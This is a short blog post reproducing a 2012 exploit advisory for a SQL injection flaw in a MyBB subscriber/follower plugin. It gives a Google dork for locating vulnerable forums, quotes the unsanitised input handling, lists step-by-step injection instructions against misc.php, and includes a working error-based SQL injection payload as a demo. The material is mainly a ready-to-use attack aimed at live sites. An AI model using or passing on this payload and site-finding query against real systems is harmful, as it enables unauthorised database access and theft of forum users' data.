New Post

» » » » MyBB Follower User Plugin SQL Injection
Sunday, November 4, 2012


# Exploit Title: Follower User MyBB plugin SQL Injection 0day
# Google Dork: intext:"Users subscribed to" inurl:member.php -site:fwcombie.us
# Date: 13.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/suscriber-user
# Version: 1.5+
# Tested on: Linux.
----------------------------------------------

The vulnerabillity exist within SuscribeUsers.php on SuscribeUsers_add():

$usid = $mybb->input[usid]; //Line 671
$uid = $mybb->input[uid]; //Line 672
if(user_awaiting($uid,$usid)) //Line 781
{ //Line 782
redirect("member.php?action=profile&uid=".$usid."# suscriberuser", $lang->double_suscription_awaiting,$lang->suscriberuser); // Line 783
} //Line 784
?>


----------------------------------------------

Instructions:
1. Create a new account on the target site.
2. Check your User ID by entering your profile link and write it down.
3. Enter here and start to inject your code:

/misc.php?suscriberuser=yes&usid='[SQLi]--+-&uid=[Your_User_ID]

----------------------------------------------

Demo:
http://server/misc.php?suscriberuser=yes&usid=' or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0)--+-2&uid=[your_uid]
Image : http://i.imgur.com/eGhzJ.png


Follow: https://twitter.com/PonyBlaze


Shotouts goes to FillySec.
04 Nov 2012
Được đăng bởi vào lúc 11/04/2012 04:38:00 PM
Nhãn: , ,

0 nhận xét:

Post a Comment

:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

Subscribe to: Post Comments (Atom)